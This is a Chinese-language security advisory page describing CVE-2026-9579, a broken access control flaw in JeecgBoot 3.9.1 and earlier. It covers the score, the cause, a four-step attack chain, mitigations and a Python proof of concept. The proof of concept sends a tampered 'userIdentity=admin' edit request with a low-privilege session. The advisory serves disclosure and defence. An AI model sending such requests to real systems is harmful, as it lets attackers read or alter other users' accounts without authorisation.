IPBUF安全漏洞报告
English
CVE-2026-9579 CVSS 6.3 中危

CVE-2026-9579 JeecgBoot越权访问漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9579
漏洞类型
访问控制失效
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
JeecgBoot

相关标签

访问控制失效JeecgBoot越权漏洞CVE-2026-9579

漏洞概述

CVE-2026-9579 是存在于 JeecgBoot 3.9.1 及之前版本中的一个安全漏洞。该漏洞源于 SysUser 组件中 /sys/user/login/setting/userEdit 接口的访问控制机制存在缺陷。攻击者可以通过操纵请求参数 userIdentity,绕过系统的权限验证逻辑。由于该漏洞允许远程利用且无需用户交互,低权限攻击者可借此提升权限或未授权访问敏感数据,对系统的机密性、完整性和可用性造成中等程度影响。目前官方已发布修复版本,建议尽快升级。

技术细节

该漏洞的技术成因在于 JeecgBoot 在处理用户编辑相关的请求时,未对关键参数 userIdentity 进行严格的权限归属校验。具体来说,受影响的代码路径位于 /sys/user/login/setting/userEdit,其中调用的 user.getUsername 函数直接信任了前端传入的 userIdentity 参数。攻击者利用这一逻辑缺陷,可以在拥有低权限账号的情况下,构造恶意 HTTP 请求,将 userIdentity 修改为目标用户(如管理员)的标识。由于后端仅校验了会话有效性而未校验当前会话用户是否有权操作该 userIdentity,导致攻击者能够成功执行越权操作,获取或修改其他用户的配置信息。

攻击链分析

STEP 1
侦察
攻击者识别目标系统为 JeecgBoot,并确认版本在 3.9.1 及以下。
STEP 2
获取低权限账号
攻击者注册或通过其他方式获取一个普通低权限用户的合法会话凭证。
STEP 3
构造恶意请求
攻击者向 /sys/user/login/setting/userEdit 接口发送 POST 请求,篡改 userIdentity 参数为目标用户 ID。
STEP 4
执行越权操作
服务器端未校验参数归属,直接处理请求,导致攻击者成功修改或访问目标用户数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-9579 PoC: JeecgBoot Improper Access Control # Target: JeecgBoot <= 3.9.1 # The attacker's low-privilege session cookie attacker_cookie = { "SESSION": "Y2VudGVyLWFkbWluLXNlc3Npb24=" } # The vulnerable endpoint url = "http://target-host:8080/sys/user/login/setting/userEdit" # Malicious payload: manipulating userIdentity to impersonate another user (e.g., admin) payload = { "userIdentity": "admin", # The vulnerable parameter "username": "test", "realname": "test", "email": "[email protected]" } try: # Send the request with the low-privilege session response = requests.post(url, data=payload, cookies=attacker_cookie, timeout=10) if response.status_code == 200: print("[+] Exploit Successful! Response received.") print(response.text) else: print(f"[-] Exploit Failed. Status Code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

JeecgBoot <= 3.9.1

防御指南

临时缓解措施
在未完成升级前,建议通过网络访问控制列表(ACL)限制对 /sys/user/login/setting/userEdit 接口的外部访问,或部署 Web 应用防火墙(WAF)规则,拦截对 userIdentity 参数的异常篡改请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表